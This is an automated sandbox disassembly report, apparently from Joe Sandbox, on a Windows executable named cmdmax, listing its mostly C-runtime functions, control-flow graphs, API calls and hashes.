                        • Opcode Fuzzy Hash: 51c1bba1868696b56766017a525fd275070f8669f06dd8a5ee0a9d837f02c277
                        • Instruction Fuzzy Hash: 5F815275D00208AADB00DFE4D98AFBF77B8AF08715F104066F904FB2A1E7789A55C75A
                        Function 00404140 Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 46 404140-40414e 47 404150-40416a CompareStringA 46->47 48 404176-40417c 46->48 49 404190-4041aa CompareStringW 47->49 50 40416c 47->50 51 4041c2 48->51 52 40417e-40418e call 404430 48->52 54 4041b8-4041c1 49->54 55 4041ac-4041b6 49->55 50->48 56 4041c6-4041cc 51->56 52->56 55->48 58 4041e0 56->58 59 4041ce-4041de call 404430 56->59 61 4041e4-4041eb 58->61 59->61 62 404209-404210 61->62 63 4041ed-404208 CompareStringA 61->63 65 404425-40442c 62->65 66 404216-404224 62->66 67 404226-40422b 66->67 68 40422f-404231 66->68 67->68 69 404233-404235 68->69 70 40423b-40423d 68->70 69->70 71 40433a-404353 MultiByteToWideChar 69->71 72 40424c-40424f 70->72 73 40423f-40424b 70->73 74 404355-40435e 71->74 75 40435f-404374 call 403ea0 71->75 76 404251-40425d 72->76 77 40425e-404261 72->77 84 404380-40439b MultiByteToWideChar 75->84 85 404376-40437f 75->85 79 404270-404282 GetCPInfo 77->79 80 404263-40426f 77->80 82 404284-40428d 79->82 83 40428e-404290 79->83 86 404292-404297 83->86 87 4042e4-4042e6 83->87 90 404407-404422 call 404b20 * 2 84->90 91 40439d-4043b4 MultiByteToWideChar 84->91 88 4042a6-4042af 86->88 89 404299-4042a5 86->89 87->71 92 4042e8-4042ed 87->92 94 4042b1-4042b6 88->94 95 4042ca-4042d6 88->95 90->65 91->90 96 4043b6-4043cc call 403ea0 91->96 97 4042fc-404305 92->97 98 4042ef-4042fb 92->98 94->95 100 4042b8-4042bc 94->100 96->90 111 4043ce-4043e1 MultiByteToWideChar 96->111 102 404320-40432c 97->102 103 404307-40430c 97->103 105 4042c2-4042c8 100->105 106 4042be-4042c0 100->106 103->102 108 40430e-404312 103->108 105->94 105->95 106->105 110 4042d7-4042e3 106->110 112 404314-404316 108->112 113 404318-40431e 108->113 111->90 114 4043e3-404403 CompareStringW 111->114 112->113 115 40432d-404339 112->115 113->102 113->103 114->90
                        APIs
                        • CompareStringA.KERNELBASE(00000000,00000000,00407E20,00000001,00407E20,00000001,00550D38,?,?,FFFFFFFE,?,FFFFFFFE), ref: 00404162
                        • CompareStringW.KERNEL32(00000000,00000000,00407E24,00000001,00407E24,00000001,?,?,?,?,0040129B,CMDMAX_DEBUG), ref: 004041A2
                        • CompareStringA.KERNEL32(?,?,?,?,?,?,00550D38,?,?,FFFFFFFE,?,FFFFFFFE), ref: 004041FB
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: CompareString
                        • String ID:
                        • API String ID: 1825529933-0
                        • Opcode ID: 1ff1008ee3a4a55d8727752ad5fe31d2fa36966b366071291e4c568b1e8beb1f
                        • Instruction ID: e767498d96deb41678ceb7339b19bbc0015ffd8f8e65b5060bc0486a620b20b8
                        • Opcode Fuzzy Hash: 1ff1008ee3a4a55d8727752ad5fe31d2fa36966b366071291e4c568b1e8beb1f
                        • Instruction Fuzzy Hash: FA912BB27043006BD7209B95EC85B6BB7A8D7C5365F44047FFB40E6280D27EE94987A7
                        Function 00403490 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 116 403490-4034a8 call 403ea0 119 4034b4-4034cc 116->119 120 4034aa-4034b1 call 401880 116->120 122 4034f3-403504 GetStartupInfoA 119->122 123 4034ce-4034d0 119->123 120->119 126 4035d8-4035da 122->126 127 40350a-40350f 122->127 125 4034d5-4034f1 123->125 125->122 125->125 128 4035e0-4035f0 126->128 127->126 129 403515-403527 127->129 130 4035f2-4035fd 128->130 131 403645 128->131 132 403529 129->132 133 40352e-403534 129->133 136 40360d-403615 GetStdHandle 130->136 137 4035ff-40360a 130->137 138 403649-40364d 131->138 132->133 134 403593-403597 133->134 135 403536 133->135 134->126 142 403599-40359e 134->142 139 40353b-40354a call 403ea0 135->139 140 403617-403620 GetFileType 136->140 141 40363f-403643 136->141 137->136 138->128 143 40364f-403662 SetHandleCount 138->143 152 40354c-40355e 139->152 153 40358d 139->153 140->141 145 403622-40362c 140->145 141->138 146 4035a0-4035a3 142->146 147 4035cf-4035d6 142->147 149 403634-403637 145->149 150 40362e-403632 145->150 146->147 151 4035a5-4035ae GetFileType 146->151 147->126 147->142 149->138 154 403639-40363d 149->154 150->138 151->147 155 4035b0-4035cc 151->155 156 403580-403589 152->156 157 403560 152->157 153->134 154->138 155->147 156->139 159 40358b 156->159 158 403562-40357e 157->158 158->156 158->158 159->134
                        APIs
                        • GetStartupInfoA.KERNEL32(?), ref: 004034F8
                        • GetFileType.KERNEL32(00000000), ref: 004035A6
                        • GetStdHandle.KERNEL32(FFFFFFF6), ref: 0040360E
                        • GetFileType.KERNELBASE(00000000), ref: 00403618
                        • SetHandleCount.KERNEL32(00000020), ref: 00403655
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: FileHandleType$CountInfoStartup
                        • String ID: @
                        • API String ID: 1710529072-2766056989
                        • Opcode ID: 63df62efcc3922071b0c15ba09ff141fc4bde9c6b434e268c60b1111de638fc9
                        • Instruction ID: 372a2bf32b0bdc82c37bf4d41fc824613e188a480a206bcbb4d6fa6d6a21597a
                        • Opcode Fuzzy Hash: 63df62efcc3922071b0c15ba09ff141fc4bde9c6b434e268c60b1111de638fc9
                        • Instruction Fuzzy Hash: 595122719042449BD7318F38CE8471A7FA8AB02325F18467ED895AB3E1D738D946C79A
                        Function 00401770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetVersion.KERNEL32 ref: 00401796
                          • Part of subcall function 00403670: HeapCreate.KERNELBASE(00000001,00001000,00000000,004017CC), ref: 00403679
                          • Part of subcall function 00403490: GetStartupInfoA.KERNEL32(?), ref: 004034F8
                          • Part of subcall function 00403490: GetFileType.KERNEL32(00000000), ref: 004035A6
                        • GetCommandLineA.KERNEL32 ref: 004017DD
                          • Part of subcall function 00403020: GetEnvironmentStringsW.KERNEL32 ref: 00403036
                          • Part of subcall function 00403020: GetEnvironmentStringsW.KERNEL32 ref: 0040308F
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$CommandCreateFileHeapInfoLineStartupTypeVersion
                        • String ID: 8U$8U
                        • API String ID: 796813354-3775541337
                        • Opcode ID: f6e6d59e7de11bbe1f9c79c4729ef30da786d8d204601ce81188c11fc54d5798
                        • Instruction ID: bae357295b154c56a0da60b6029cb3d48fad92364151424cd4935dcd8c5fbeea
                        • Opcode Fuzzy Hash: f6e6d59e7de11bbe1f9c79c4729ef30da786d8d204601ce81188c11fc54d5798
                        • Instruction Fuzzy Hash: CB2163B1D04644AFD710EF69AE0675A7BA8EB04315F10063FF419B37E2E77C65008B6A
                        Function 00402780 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 185 402780-40279b 186 4027dc-4027f0 call 402800 185->186 187 40279d-4027a4 185->187 195 4027f2-4027f7 ExitProcess 186->195 196 4027fd-4027ff 186->196 189 4027a6-4027b5 187->189 190 4027ca-4027d9 call 402800 187->190 189->190 193 4027b7-4027bb 189->193 190->186 197 4027bd 193->197 198 4027bf-4027c8 193->198 197->198 198->190 198->193
                        APIs
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 54e3e19046fbf29639bf15c34da984302160871c38c6a1032c6c2c714584590b
                        • Instruction ID: 801cb8b31a74135f60e5dde2dc570042dc3b1dfd1c2c9a6f8921881583090a25
                        • Opcode Fuzzy Hash: 54e3e19046fbf29639bf15c34da984302160871c38c6a1032c6c2c714584590b
                        • Instruction Fuzzy Hash: 9CF0AF769042009AEF20AB79EF8DB6677A0A750705F10457FF880731E1D6B8BC448A7F
                        Function 00403670 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 199 403670-403684 HeapCreate
                        APIs
                        • HeapCreate.KERNELBASE(00000001,00001000,00000000,004017CC), ref: 00403679
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: 07373dfd54a1dc70f1ee3f471f143bd0286662016e5a5ba00e92ec479078b4e4
                        • Instruction ID: 5d6950380f6a30326c0bb27adfbe44092808890bba6650e2d3bb44798f57916f
                        • Opcode Fuzzy Hash: 07373dfd54a1dc70f1ee3f471f143bd0286662016e5a5ba00e92ec479078b4e4
                        • Instruction Fuzzy Hash: 10B012702813009EE3100B305F06F4435206708B42F100024B2807C1E4CAF01051850D

                        Non-executed Functions

                        Function 00404790 Relevance: 15.2, APIs: 10, Instructions: 222COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 200 404790-40479b 201 4047ec 200->201 202 40479d-4047b9 LCMapStringA 200->202 205 4047f2-4047fd 201->205 203 4047c2-4047dc LCMapStringW 202->203 204 4047bb-4047c0 202->204 206 4047e5-4047eb 203->206 207 4047de-4047e3 203->207 204->205 208 404814-40481c 205->208 209 4047ff-40480f call 4049c0 205->209 207->205 211 40481e-40483e LCMapStringA 208->211 212 40483f-404847 208->212 209->208 213 40484d-404853 212->213 214 40491f-404923 212->214 216 404855-40485a 213->216 217 40485e-404879 MultiByteToWideChar 213->217 216->217 218 404882-404896 call 403ea0 217->218 219 40487b-404881 217->219 222 404898-40489e 218->222 223 40489f-4048b6 MultiByteToWideChar 218->223 224 4048b8-4048d2 LCMapStringW 223->224 225 40490b-40491d call 404b20 * 2 223->225 224->225 227 4048d4-4048d9 224->227 225->214 229 404924-404938 call 403ea0 227->229 230 4048db-4048e1 227->230 229->225 239 40493a-404950 LCMapStringW 229->239 233 4049a2-4049ba call 404b20 * 2 230->233 234 4048e7-4048e9 230->234 234->225 238 4048eb-404905 LCMapStringW 234->238 238->225 238->233 239->225 242 404952-40495c 239->242 244 40497e-40499c WideCharToMultiByte 242->244 245 40495e-40497a WideCharToMultiByte 242->245 244->225 244->233 245->233 246 40497c 245->246 246->225
                        APIs
                        • LCMapStringA.KERNEL32(00000000,00000100,00407E20,00000001,00000000,00000000,?,00000000,0000000B,?,00402961,00000000,00000200,?,00000001,?), ref: 004047B5
                        • LCMapStringW.KERNEL32(00000000,00000100,00407E24,00000001,00000000,00000000,?,?,?,?,?,0000000A), ref: 004047D4
                        • LCMapStringA.KERNEL32(00000001,00000001,00000001,?,00000200,00000000,?,00000000,0000000B,?,00402961,00000000,00000200,?,00000001,?), ref: 00404838
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000001,?,00000000,00000000,?,00000000,0000000B,?,00402961,00000000,00000200,?,00000001,?), ref: 0040486F
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,0000000A), ref: 004048AE
                        • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,0000000A), ref: 004048C8
                        • LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?), ref: 004048FD
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: String$ByteCharMultiWide
                        • String ID:
                        • API String ID: 352835431-0
                        • Opcode ID: 91689ef6a8061157262080b5655910052be4cc0885f97463720962df06819704
                        • Instruction ID: 2c29ff3f2fb97a1670f5a264d2ad8a999c8045613722e7b8bdd10dfdb192a7e9
                        • Opcode Fuzzy Hash: 91689ef6a8061157262080b5655910052be4cc0885f97463720962df06819704
                        • Instruction Fuzzy Hash: AD517CF67043006BE210EBA5AC41F6B7798DBC9755F14043AF744E72D0DA79EC018BAA
                        Function 00403020 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 247 403020-40302e 248 403070-403078 247->248 249 403030-40303c GetEnvironmentStringsW 247->249 252 40307e-403085 248->252 250 40304e-403058 GetEnvironmentStrings 249->250 251 40303e-40304c 249->251 253 403066-40306f 250->253 254 40305a-403064 250->254 251->252 255 40308b-40308d 252->255 256 40312d-403134 252->256 254->252 257 4030a1-4030a7 255->257 258 40308f-403095 GetEnvironmentStringsW 255->258 259 4031b1-4031ba 256->259 260 403136-403138 256->260 264 4030a9-4030b0 257->264 265 4030bb-4030d9 WideCharToMultiByte 257->265 258->257 261 403097-4030a0 258->261 262 403150-403155 260->262 263 40313a-403144 GetEnvironmentStrings 260->263 267 403165-403177 call 403ea0 262->267 268 403157-40315c 262->268 263->262 266 403146-40314f 263->266 264->264 269 4030b2-4030b9 264->269 270 4030db-4030e8 call 403ea0 265->270 271 40311c-40312c FreeEnvironmentStringsW 265->271 277 403179-403189 FreeEnvironmentStringsA 267->277 278 40318a-4031b0 FreeEnvironmentStringsA 267->278 268->268 272 40315e-403163 268->272 269->264 269->265 270->271 279 4030ea-4030fe WideCharToMultiByte 270->279 272->267 272->268 280 403100-403109 call 404b20 279->280 281 40310b-40311b FreeEnvironmentStringsW 279->281 280->281
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 00403036
                        • GetEnvironmentStrings.KERNEL32 ref: 0040304E
                        • GetEnvironmentStringsW.KERNEL32 ref: 0040308F
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030CF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030F6
                        • FreeEnvironmentStringsW.KERNEL32(?), ref: 0040310C
                        • FreeEnvironmentStringsW.KERNEL32(?), ref: 0040311D
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                        • String ID:
                        • API String ID: 1823725401-0
                        • Opcode ID: 33bbc3f1baf684cecbe4868c8c978916208efd2582274dfbb109430b9d872f4c
                        • Instruction ID: 4005c8ad7f123dcd08d34e7d596d0a2ed273d4a167ce10c24e384bddb9be3eea
                        • Opcode Fuzzy Hash: 33bbc3f1baf684cecbe4868c8c978916208efd2582274dfbb109430b9d872f4c
                        • Instruction Fuzzy Hash: AF412576B403045BE7206F64BC497673B98E784333F54003BED05A6381E77EA90CC29A
                        Function 00404B40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 55libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 496 404b40-404b4b 497 404b4d-404b5c LoadLibraryA 496->497 498 404b8f-404b96 496->498 499 404bcc-404bd1 497->499 500 404b5e-404b73 GetProcAddress 497->500 501 404b98-404b9a 498->501 502 404b9c-404b9e 498->502 500->499 503 404b75-404b8a GetProcAddress * 2 500->503 501->502 504 404ba0-404ba7 502->504 505 404bb2-404bcb 502->505 503->498 504->505 507 404ba9-404bb0 504->507 507->505
                        APIs
                        • LoadLibraryA.KERNEL32(user32.dll,?,?,?,0040394A,?,Microsoft Visual C++ Runtime Library,00012010,?,?,00000000), ref: 00404B52
                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404B6A
                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404B7B
                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404B88
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                        • API String ID: 2238633743-4044615076
                        • Opcode ID: 4a9723a7828e76fe50fc032433e0afbaf72be46e8f0aae19df462a7516b8695a
                        • Instruction ID: bd30521effc3bf44185d56dacefefe439e8c1685cf67d71c121490aaf00fd7e0
                        • Opcode Fuzzy Hash: 4a9723a7828e76fe50fc032433e0afbaf72be46e8f0aae19df462a7516b8695a
                        • Instruction Fuzzy Hash: CD0184B1A063565BD310AFA5DD84F2B77E8DBC4B5271401B6E900F2290C7B8EC44CBEA
                        Function 004037B0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 159fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 510 4037b0-4037c7 511 4037c8-4037ca 510->511 512 4037d8-4037e6 511->512 513 4037cc-4037d6 511->513 514 403993-40399d 512->514 515 4037ec-4037f3 512->515 513->511 513->512 516 403958-403963 515->516 517 4037f9-403800 515->517 520 403965-40396d GetStdHandle 516->520 521 40396f-40398d WriteFile 516->521 518 403802-403809 517->518 519 40380f-403815 517->519 518->516 518->519 519->514 522 40381b-403834 GetModuleFileNameA 519->522 520->521 521->514 523 403836-40384b 522->523 524 40384c-403868 522->524 523->524 525 403890-403957 call 404b40 524->525 526 40386a-40388d call 404be0 524->526 526->525
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00403830
                        • GetStdHandle.KERNEL32(000000F4,?,?,00000000), ref: 00403967
                        • WriteFile.KERNEL32(?,?,FFFFFFFE,00000000,00000000,?,?,00000000), ref: 0040398D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: File$HandleModuleNameWrite
                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                        • API String ID: 3784150691-4022980321
                        • Opcode ID: a436efcfc72d5c591da5e93a6fc445f4f5db0aa4265214052baa93e641a77d96
                        • Instruction ID: 9c3b1f96b856c350f621c52e0a91f0f66bf3b15c1bfcf1076c0cd6de472e1383
                        • Opcode Fuzzy Hash: a436efcfc72d5c591da5e93a6fc445f4f5db0aa4265214052baa93e641a77d96
                        • Instruction Fuzzy Hash: 974113367046050BD728DA389A1477E7BD6EFC4321F50473EFA26B76D0CAB9AE048256
                        Function 004049F0 Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 531 4049f0-4049fe 532 404a00-404a1a GetStringTypeA 531->532 533 404a4c 531->533 534 404a23-404a39 GetStringTypeW 532->534 535 404a1c-404a21 532->535 536 404a52-404a5a 533->536 537 404a42-404a4b 534->537 538 404a3b-404a40 534->538 535->536 539 404a89-404a91 536->539 540 404a5c-404a62 536->540 538->536 543 404a93-404a9d 539->543 544 404b0b-404b12 539->544 541 404a64 540->541 542 404a6a-404a88 GetStringTypeA 540->542 541->542 545 404aa5-404ac0 MultiByteToWideChar 543->545 546 404a9f 543->546 547 404b00-404b09 call 404b20 545->547 548 404ac2-404ac3 545->548 546->545 547->544 550 404ac5 call 404060 548->550 552 404aca-404ad1 550->552 552->547 553 404ad3-404aea MultiByteToWideChar 552->553 553->547 554 404aec-404afe GetStringTypeW 553->554 554->547
                        APIs
                        • GetStringTypeA.KERNEL32(00000000,00000001,00407E20,00000001,?,?,00000000,0000000B,?,?,00000002,?,?,?,0000000A), ref: 00404A16
                        • GetStringTypeW.KERNEL32(00000001,00407E24,00000001,?,?,?,?,0000000A), ref: 00404A31
                        • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000000,0000000B,?,?,00000002,?,?,?,0000000A), ref: 00404A7F
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,00000000,0000000B,?,?,00000002,?,?,?,0000000A), ref: 00404AB6
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,?,?,?,?,0000000A), ref: 00404AE2
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,0000000A), ref: 00404AF8
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: StringType$ByteCharMultiWide
                        • String ID:
                        • API String ID: 3852931651-0
                        • Opcode ID: 9088a58cb0110ca152e68b03d436b7ab7cd9faafc8e28d45a1373a8a13234b3e
                        • Instruction ID: 871e9140d8e42ba65fb42cff073d1d9aef57c38841bfaff7c614589857a5e468
                        • Opcode Fuzzy Hash: 9088a58cb0110ca152e68b03d436b7ab7cd9faafc8e28d45a1373a8a13234b3e
                        • Instruction Fuzzy Hash: 803190B27452006BE210DB65EC85F3B73A9E7C9715F04013AFB44B7280D6B9FC058BAA
                        Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 555 401000-401044 GetCurrentProcessId call 401350 SetConsoleTitleA 558 40104a-40106e Sleep FindWindowA 555->558 559 401084-401090 558->559 560 401074-40107e 558->560 560->558 560->559
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 0040101D
                        • SetConsoleTitleA.KERNEL32(?), ref: 00401044
                        • Sleep.KERNEL32(00000064), ref: 00401052
                        • FindWindowA.USER32(00000000,?), ref: 00401061
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: ConsoleCurrentFindProcessSleepTitleWindow
                        • String ID: CMDMAX:%d
                        • API String ID: 960006182-1358362588
                        • Opcode ID: 48520546924323c45bbdf36bac6515e9c5ea32c08305208bdbf8af8f6b11a226
                        • Instruction ID: 5a933a1f5bc0470be587deae832df0d0f7ca835772c44b334be0bbb2aee9f6c3
                        • Opcode Fuzzy Hash: 48520546924323c45bbdf36bac6515e9c5ea32c08305208bdbf8af8f6b11a226
                        • Instruction Fuzzy Hash: 9C018171900218EBEB50AB94DE49B99B77CFB00306F1080A6F685F6091DBB45A888F66
                        Function 00404460 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 211COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
